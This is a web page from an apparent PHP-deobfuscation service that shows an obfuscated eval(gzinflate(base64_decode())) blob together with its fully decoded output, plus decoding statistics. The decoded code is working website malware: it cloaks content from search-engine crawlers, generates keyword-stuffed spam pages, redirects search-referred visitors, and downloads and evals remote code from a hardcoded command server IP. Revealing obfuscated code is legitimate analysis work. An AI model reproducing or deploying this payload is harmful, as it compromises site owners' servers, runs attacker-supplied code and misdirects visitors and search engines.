Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(gzinflate(base64_decode("rRlrc5tI8q8QhzWwixDoLTvYSSXKozZxfLZ8e1U+nQrBICgj4ADF8Tr+79fd..
Decoded Output download
if (!defined('rdgNsin')){ define('rdgNsin' ,1); if(!defined('rdgnD')) { @error_reporting(0); @set_time_limit(60); @ignore_user_abort(true); } function ni_achunk($a,$c){ $ac = count($a); shuffle($a); return array_slice($a,0,(($c<$ac)?$c:$ac)); } function ni_arand($a){ return $a[rand(0, count($a)-1)]; } function ni_dl($url, $ua='', $p = false) { if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $ua); if ($p) { curl_setopt($ch, CURLOPT_POSTFIELDS, $p); } $out = curl_exec ($ch); $code = curl_getinfo($ch, CURLINFO_HTTP_CODE); if (curl_errno($ch) !== 0 || ($code != 200)) $out = false; curl_close ($ch); } else { $o = array('header' => array('User-agent: '.$ua)); if ($p) { $o['method']='POST'; $o['header'][]='Content-type: application/x-www-form-urlencoded'; $o['content']=$p; } $c = stream_context_create(array('http' => $o)); $out = @file_get_contents($url, false, $c); } return trim($out); } function ni_getc($f){ $fc = @file_get_contents($f); return ($fc)?(defined('rdgnD')?$fc:gzinflate($fc)):''; } function ni_putc($f,$d){ return @file_put_contents($f, defined('rdgnD')?$d:gzdeflate($d,9) ); } function ni_dlc($url){ global $tdir,$h; $cfn = ni_cfn($tdir,$h,$url); $cc = ni_getc($cfn); if ($cc){return $cc;} $c = ni_dl($url); if($c){ ni_putc($cfn,$c); } } function ni_tmpdir(){ global $h; if(defined('rdgnDt')){return './tmp';} $fs = array(); foreach (array('upload_tmp_dir','session.save_path') as $v) { if ($t = ini_get($v)) {$fs[]=$t;} } foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) { if ($t = getenv($v)) {$fs[]=$t;} } if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();} $fs=array_merge($fs,array('./wp-content/cache','./wp-content/uploads','./tmp','./cache','./images','/tmp','/var/tmp','.')); $fs=array_unique($fs); $bf = ''; $bt = time(); foreach ($fs as $f){ $cfn = ni_cfn($f,$h,'tdcheck'); if(!@file_exists($cfn)){ni_putc($cfn,uniqid());} $ft = @filemtime($cfn); if ($ft && $ft < $bt){$bt = $ft; $bf = $f;} } if (ni_folder(ni_cfn($bf,$h,'tdcheck'),1)){return $bf;} } function ni_isb($ip){ $lip = ip2long($ip); $a = array(array(599717632,599717887),array(599719936,599785471),array(1089052672,1089060863),array(1113980928,1113985023),array(1123635200,1123639295), array(1208926208,1208942591),array(1249705984,1249771519),array(1823541248,1823543295),array(1823563776,1823571967),array(-2100101120,-2100100097), array(-1395064832,-1395056641),array(-1395056640,-1395052545),array(-1395032064,-1395023873),array(-1395023872,-1395019777), array(-1395015680,-1395007489),array(-1392691200,-1392689153),array(-1392676864,-1392672769),array(-1379794944,-1379729409), array(-782925824,-782893057),array(-667238400,-667230209),array(-655417344,-655409153),array(392167424,392691711) ); foreach ($a as $ai) { if($lip >= $ai[0] && $lip <= $ai[1]){return true;}} if(!defined('rdgnD')){ $h=@gethostbyaddr($ip); $hba=array('google.com','googlebot.com','msn.com','yahoo.com'); if($h){foreach ($hba as $hb){ if(strpos($h, $hb)!==false){return true;}}} } $ua=@strtolower($_SERVER['HTTP_USER_AGENT']); $bots = array('googlebot','bingbot','msnbot','slurp','duckduckbot'); foreach ($bots as $b) if(strpos($ua, $b)!==false) return true; } function ni_ishtm($uri){ $ruri = strtolower($uri); $farr = array('wordfence_lh','/wp-admin/','/feed/','\?share=','\?cf_action='); foreach ($farr as $f) {if(preg_match("#$f#",$ruri)){ return false;}} $ext = pathinfo(parse_url($ruri, PHP_URL_PATH), PATHINFO_EXTENSION); return @in_array($ext,array('','php','htm','html')); } function ni_linknorm($l){ global $h; $l = preg_replace('#^http(|s)://'.str_replace('.','\.',$h).'(:[0-9]+)?#i','', $l, 1 ); if (preg_match('#^http(|s)://#i', $l)){return false;} if (!ni_ishtm($l)){return false;} $l = preg_replace('/#.*$/i', '', $l, 1); if ($l=='') $l='/'; return $l; } function ni_pageid($nuri, $dpages){ foreach($dpages as $k=>$l){ if (key_exists(0,$l) && $l[0] == $nuri){return $k;} } return false; } function ni_genpage($ht, $ruri, $dpages, $keys, $text, $dads, $tad){ $htm = str_get_html($ht, true, true, 'UTF-8', false); if (!$htm) { return array(false,false); } $tg = new ni_TextGenerator($text); $tg->otherkeys=$keys; $nuri = ni_linknorm($ruri); $cpid = ni_pageid($nuri, $dpages); if($cpid!==false){ $pkeys=array_slice($dpages[$cpid],1); }else{ $pkeys=ni_achunk($keys,rand(1,3)); $dpages[]=array_merge(array($nuri),$pkeys); } $title=ucwords(implode(', ',$pkeys)) . ' - ' . $tad; foreach($htm->find('title') as $e){ $e->innertext=$title; } foreach($htm->find('meta[property=og:title]') as $e){ $e->content = $title; } $descr = implode('. ',array_map('ucfirst',$pkeys)).'. '.implode(' ', ni_achunk($dads, rand(2,4))); foreach($htm->find('meta[name=description],meta[property=og:description]') as $e){ $e->content=$descr; } foreach($htm->find('meta[name=keywords]') as $e){ $e->content=implode(', ',$pkeys); } foreach ($htm->find('a') as $e) { $nuri=ni_linknorm($e->href); if ($nuri===false) {continue;} $cpid = ni_pageid($nuri, $dpages); if($cpid!==false){ $opkeys=array_slice($dpages[$cpid],1); } else { $opkeys=ni_achunk($keys,rand(1,3)); $dpages[]=array_merge(array($nuri),$opkeys); } $na = ni_arand($opkeys); $e->innertext=$na; if ($e->title){ $e->title=$na; } } foreach($htm->find('h1,h2,h3,h4,h5,h6') as $e){ if ($e->first_child() and $e->first_child()->tag=='a'){continue;} $e->innertext=($e->tag=='h1')?ni_arand($pkeys):ni_arand($keys); } $mt = false; foreach ($htm->find('div.entry-content') as $e) { $tg->keyword = ni_arand($pkeys); $e->innertext=$tg->GetText($pkeys); $mt = true; break; } $pts = $htm->find('p'); $ptsa = array(); $ptsmi = false; $ptsmc = false; for ($i=0; $i < count($pts); $i++) { $tc = substr_count($pts[$i]->innertext, '.'); $tc = $tc?$tc:1; $ptsa[$i]=$tc; if($ptsmc<=$tc){$ptsmc=$tc;$ptsmi=$i;} } for ($i=0; $i < count($pts); $i++) { if(!$mt && $i===$ptsmi){ $pts[$i]->outertext = $tg->GetText($pkeys); $mt=true; break; }else{ $pts[$i]->innertext = $tg->GetParagraph($ptsa[$i],ni_arand($pkeys),false); } } if(!$mt) { foreach ($htm->find('body') as $e) { $e->innertext = $tg->GetText($pkeys) . $e->innertext; break; } } $out = $htm->save(); return array($out, $dpages); } function ni_makepage($ht){ global $tdir, $ruri, $sm,$h; $keys = explode("
", ni_dlc($sm.'&a=k')); if(count($keys)<10){return;} $tad = ni_dlc($sm.'&a=ta'); if(!$tad){return;} $dad = explode("
", ni_dlc($sm.'&a=da')); if(count($dad)<10){return;} $text = ni_dlc($sm.'&a=t'); if(!$text){return;} if(eval(ni_dlc($sm.'&a=s'))===false){return;} if(eval(ni_dlc($sm.'&a=tg'))===false){return;} $dpages = array(); $pfn = ni_cfn($tdir,$h,'pages'); $pf = @fopen($pfn,'r+'); if($pf===false){$pf = fopen($pfn,'w+');} if($pf===false){return false;} $islock = flock($pf, LOCK_EX); $t = @fread($pf,filesize($pfn)); if(!defined('rdgnD') && $t){$t=gzinflate($t);} foreach (explode("
", $t) as $l) { if($l){$dpages[]=explode('|',$l);} } list($phtml, $npages) = ni_genpage($ht, $ruri, $dpages, $keys, $text, $dad, $tad); if(count($npages) > count($dpages)){ $t=''; foreach ($npages as $l) { $t .= implode('|',$l)."
"; } rewind($pf); fwrite($pf,defined('rdgnD')?$t:gzdeflate($t,9)); } flock($pf, LOCK_UN); fclose($pf); return($phtml); } function ni_getpage($uri){ global $curi,$h; if(file_exists($curi)){ return ni_getc($curi); } $res = ni_dl(sprintf('%s://%s%s',$_SERVER['REQUEST_SCHEME'],$h,$uri),'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'); if(!$res){return;} $pc = ni_makepage($res); if ($pc && ni_putc($curi, $pc)){return $pc;} } function ni_seref($r){ $r = @strtolower($r); $ses = array('google','bing','yahoo'); foreach ($ses as $se) if(strpos($r, $se.'.')!=false){ return true;} } function ni_red($sp){ global $isb, $curi; $hr = @$_SERVER['HTTP_REFERER']; $ra = $_SERVER['REMOTE_ADDR']; $gage = !defined('rdgnD')?ni_folder($curi,4):true; if(!$isb && ni_seref($hr) && $gage){ $r=@urlencode($hr); $i=@urlencode($ra); $u=@urlencode($_SERVER['HTTP_USER_AGENT']); $red = ni_dl($sp."&a=3&r=$r&i=$i&u=$u"); if ($red) { die($red); } } } function ni_folder($f,$d){ $ft = @filemtime($f); if ($ft){return time()-$ft > $d*86400;} } function ni_cfn($td,$h,$s){ return $td.'/'.'.tmp_'.md5($h.'-'.$s); } $shid = '401'; $h = preg_replace('#:[0-9]+$#','', strtolower($_SERVER['HTTP_HOST'])); $ruri = $_SERVER['REQUEST_URI']; $nuri = ni_linknorm($ruri); if ($nuri){ $tdir=ni_tmpdir(); if($tdir){ $curi = ni_cfn($tdir,$h,$nuri); $sm = "http://5.188.62.19/n?shid=$shid&h=$h"; $sp = $sm."&p=".urlencode($ruri); $isb = ni_isb($_SERVER['REMOTE_ADDR']); if ($isb){ $page=ni_getpage($ruri); if ($page) {die($page);} } else { ni_red($sp); } } } }
Did this file decode correctly?
Original Code
eval(gzinflate(base64_decode("rRlrc5tI8q8QhzWwixDoLTvYSSXKozZxfLZ8e1U+nQrBICgj4ADF8Tr+79fdM7wkOfeo+2Br6Onp13T39PSEvqS+8JgfxsxTlcxbX+RhrGjao8SBNUzSLe1UCv02evwOkKVH6TXLsiRbZixNsiKM16oJyK9zViyLcMOWUbgJC3VEwHAdJxlbbnOWLZ0VoKtFtmUw8yT529gtwiSW4nDpuME2vlNlR5ddEEd2XMmW3GQbFwAD7DzY+n7E+EfGim0WS06WOQ/LPApdhOumrqqy+wqWaueye4K/+2wyJ/aQyGNJRHZuCWbqNbuOpS12V3qRKm+zSJfkrWMrCvymIKHvRDlDi4Rg2RJ9yb6HeZGrigsLlmEcFtxqshugUiWQ6IGEBADbJSmA3ECX3t5cff56OV9ezeY3VxfzqzcX1+9nV7pk/Qz55np29ebD7GJOEtLeSaqcIt9n11x+vZ6//zT7/O4a1SFjycm2KIVk35kr4QqYkd3EY+XEmsGm+0lN7NPF+6/Lj/P55fLt13czwZzTyLKYEDXphW1LpvTjB5JEYi9sqWeaYBnBk2wpNHSjJGcl7yeJwQwaMAE02nVVCZjjsUyR7LMScgMu1nHWLC5OJMVAI7SsICe3yoYVQeIpC1tB1ZVTAgpKi1sAv03iAgh0ioeUnUhOmoJzObin3e+d+/v7jp9kmw4IyGJUwRMUXL4K6MopGRGdNy8y5myWNPe9WLrwVTC1lL4oUpJdTlBKYYHXfhgxtO5SUMyFz5FpYI9csobw3CILNyqu3PNyoOCqso9x5LvP0PXrOIIPCBl1N9DPAXyy/hN2OkLJEUk7UZRdZumWmOmyVwcVZwgzTYa6tM/BAwYA5Qw8fapJ2n7guTxSHqV1lKycSJILL8x0OUCv9GPQD7BgoJZwXQSW7Lp8ktsDUEqHcCHHlPHvuqdix+oo56mPMlGlISzXxQa0BSw2KfBVG/IFtLytLeaAkqdidGGRgnz9vHJpIA3uxSATSqWbbNMocTzksAQWiq7kLM+BrZE738C+ThEomuTkkvytzEEy+lHIdVYBDHDgAa4tF6ck+A6H+ZdLyGXKfCZ+v1y++3R1kCgQZPG3QzQP5r78ISePK5gQvl62OwWakyVsntA3LFuju+W6kNHo3qcd4UhdF6RnYIkWkNspJzBaFn9rxHADWQEnxVz3m5OVaAqFX8V7G4f/3BJzBK980Bs9Xl6hBfBsa+0S7h4aiiKt7Yo++qFSeCCDe6eIo5SHhbAQ+aP22PIvZB96qsYNUqWEDXFuOjDMHR8TyisUTnvkEgKgFFv2q70BFn4SQY5TS+lWO+LBYV8HxIqvbLp4mK9UOUxRzSjEcy9Me1EC5z4CgaNTOTH/P5xOx9Z41O/pfDSZjDW9MTWd9kc0NRkOxlY5ZZmTqTnsjcY9nYYjczLqV5OW1Z9OzGlvovPh0Ow1Jnv9UX8Ix4nOh9PedKjpQiarB9R6I/iv03DQG05rpr3BdGwOp5OBTsOxNbSm1eSk1x8OAA4radgnuo3JUX88HvFJUGtUqdnpWaZpmSCNqYuxaU7HlUwdUGFojgYTsBEfD0ejQSVVDTLL6d5wMGxP93tAQEz3+pNxvz2NoJK4BYrtMreGo0lJ3RwPJtPm8t5oaqE5+XgytYb99vR4NBHMccPGo+bq8XQ8HUwHNA3j3nRgTmvm40lv2htOejANw8m0bw5rs42AWH8yQM40NHtmTXk0hM0Y95EwDs2mVCCHNRoPgCoXfmxZdJjUwepQrDohz2oqefKZjZBbc0HhhJBXHGItqoDAevX06elwMQwREdiv11hX5MXqwfG8rAyKYOXYIoOtk2QdMcNNNpBz+McqKcT3Jo/F6MEJkoTG4gAKtMdafqBHGgQrjRSAAiNNII9ADYYwKK94NbojN8Yy1qyvAb9IouQe8oC8hGrxr7OrW4WKNqwdl1Q8KgvKe0lRH0u1vCDhCop9PgKp+SCPthmmUm/r3uEfQlt2J2oo+Eprir11dARVYktNsffyT1Bs8GQO0eAZ/PICq9IHZzCPg8i14PdJ5vlQqcGFJMC0DweG423CuIsfPmMeDv5+ngdOxmwauj5cRJCp3VaB6PJMLz2CDmnG1suNU7iBevRS9l8e6SSUVldAvJgF48tQ/IFIeFZTzZw6WQ7XoQwKDVyiS5cfYQOuPi8v38w/QpDgD5XTs7/NZxfXn75e1IXa6zBect2Qank8guRpgDsANuL/I2X/5hOF8R3cxMCKUbtSkSMUDxWC61zkwF1KefkPrE/VH7l20u0qBhi6njPQUPAPfNNQ1JNbszNd/KadvwwBjrciqFYtSRxTDTO1aSI2oNaHjjAXrXpRb/gBjAPidl8av8pdJFlJUJ6TkQ13NbhhRLbSVSo7ytFeEQsVAhy8ckxbInv4nYOdhAuoAkI+cGefkQ2RwR17KM9zUwcoTyOYT+CyQ9Tqc/WOjtWWOnt1e4xsIKQLXRLuITjDAHjhD94mEAz1Dn45HuWgYsMjggordAFOBIOp/K/czN93Joq4TQgLvcClmBGbd2qV3zdKPDB6scbaht2jlHMQ4AOLWeYUCYQeyoOxV6w7Z0kRsAzltEnaU24CXhbVDpiJaHXT0ONzh80vinDAqnMb3FOJfuvuz/FvCXVBjYsnvDFWyI3+AhmRLvyW3qfaTyxetKpPEWW0gTqnIgwRFhGzty7mllwNN1B4euCCYN0STZMMSZE68GfQ9pzWTgSm7pzBAQLnB9ERdTapxTpnYQxGRXPanM1pXa+31sIt1rlNsyQF7Ac7WZ8Q9mKHmqiNsRSsqMkey13MkJXgIKsuFHdSuHC4fpjlRa2MgRhGhQ7YzW4Nd0IyZ08faJp2+rzAsbNhNvEPU3T4hb6nR3P2sDY21+CnliFGID1t0XN0Du3cafN+1CTrVESwj4BOYbccGugGGfPLpEMI1bH2iCzDeEvJ639z+eQ/8/m6TfL/cfuk4fexw8UWDbRqasdvY0fYAMDkdcLsPGxo+umZvQssPejpQV8PBnow1INRY+dKkuScSzcII7gkSSCJtAcFXs4asj7sWcvyLTm5fIQXWIp2XivG9TqpAbUJNo0m1UE38cJvBvhW9lDeS1tug/lReGXLlM9YEtE/sAKTbQOHZOAV0gokuCPBUqrWmpKkWL4g3Gl2FxCwCWsl6NttKQUKhbYJUyFcLEU/FLBwcfjbb1wPam5tV3jY1Bi3crhoyA9RZZAMhA3/z+HvxBJCITJo6HJvJyle4TdcY+mD5ri0thyWfYt/LxtW6GgiPIQxAjkJOjRKCZNtwSUksZ6xsd22cHmW7GnZoHEJu7nOnDRQKw313T1uHKhPpawo9kFnWiXeQ8t/2GHGTeHxxGmiNZyk6uxyHtg/Unc66dRLbKaidnGyce5YWZ3s9uKqYiXf8L4cigPM2HeeZY/+Hh/pVTMv3xjKsWPfKbxBq4q9JBVeWWZZMWHUwvlZNubqhYVTNlR4+VOje4T+U66es8MW1uxx5SbeZVtzxZKnxgcY++ZE6g5+DozsnUvZ89jF+jB6WXm24vhg11MhRB75PrWO4GSFecDWley38k6Z+jUXjtjEu0e8pz3E3SI8zKPEvcO1+Iu4uvT569vf4dZCUU/swfc8msIeVh7+yYiH9sy7EkUtdrIKu9F0LlCaKkDaOwuTFB9RdaOH1dW5VuIqPxSszCmLRFCpgxBYH8PymDt62SP+r2pvUXo3Hakkd1YmJxFImH8KG9uIdaDH9XUi4llVMhpVGRfZQDV5w/8+pDSCJYZ/n4UFmVLf76cXzX56oU/FPXBnk27wTunTG4sgyvdXmObQewK3Db+Al6HvopFEs7vd2WzfhesOPC/8wX8y8mjecM/TLIwLX1V+yeFq+Ev+Sw7aVw2Kq9lfbmbX8+X124+zLzNlIfr7UJ8oX5I/wyhyukPDlNQ/wELJfS5dzCXLNOCYAMBocCp9Hw006U2aRuwPtvo9LLrD/tjojyT194/zL591cIk7Jn1g7l2iSW+DLNmw7gTWG/3pZGxYg6l07cDtPxTLqhSQ4fWwDtJUvB/USTIT1Rw+P7no23Wjl/tW6jZ6rqm713PNGZSUQIc6HhhPzX5HhlGWs70ujWjRlL2kdhcjFx6HVWmjEYPpO2cGHtgvqpqz1UPakSwDl5PztOEJYb7SuT9g34uk3WkxXc3ez65mV8oCEDKsSpo7/OXrfLZ88+4dn16D/QBhL0Gc131sbsOBdsIPatoRkEGYWVguyHhOQXpkRPt19XJHs1g4tGAZvpvK2xbs550yMEX9cJSnxhFk8v5xZsvZMZYux1tb3h6VfgDIGOteyPiYn8tt25YKive0/UcAv34CqDt99DDRQeQzyE6/TkYD09zbNnFYUADljQfwwjOULuy+gc9MirHxhmAdQ+kohiwq3zygW4syMC18DAn2G0aiDyS/5F2g51uNH/HddUE3ENHG2w/1m6tP5Ag/6R1U9yxKrnAA2o2HOH7OIZTeZSoq7TfCWHQhcuycHGFzCrLP0LAmE2PUM6xpNz5HvW3S/jiw5eAIsfH1A8/so+PUPjKaziPooR/a1aPJYS8vNQAUqk7BQ+1mnm1qiRBwG/IaGtPGiqteIxpLb3qS/gU=")));
Function Calls
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | 8d47a0965a6877d40208069f6aa9a065 |
Eval Count | 1 |
Decode Time | 107 ms |